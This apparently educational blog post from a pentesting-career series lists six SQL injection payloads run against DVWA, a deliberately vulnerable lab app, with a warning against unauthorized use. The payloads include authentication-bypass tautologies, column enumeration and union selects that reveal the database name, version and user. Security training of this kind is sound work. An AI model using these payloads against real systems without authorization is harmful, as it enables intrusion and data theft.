Tips for an Information Security Analyst/Pentester career - Episode 9: DVWA (SQL injection)
- The following SQL injection attacks were run on a deliberately vulnerable virtual machine for demonstration purposes only. Don't attempt them on systems you don't have any authorization for, otherwise you're in for a spot in a Federal jail. You've been warned!!
- For these attacks to succeed, you need to toggle security level to low, otherwise they won't run. The whole point of DVWA is to show the impact from common attacks and how mitigation techniques can help prevent such attacks from being exploited.
In this post, we're gonna have fun with some SQL injection attacks.
- First injection: ' or 1=1 #
- Second injection: 'OR '1'='1' -- ';
- Third injection: 1' order by 1 #
- Fourth injection: 1' or 1=1 order by 1 #
- Fifth injection: ' and 1=1 union select database(),version() #
- Sixth injection: ' and 1=1 union select null,user() #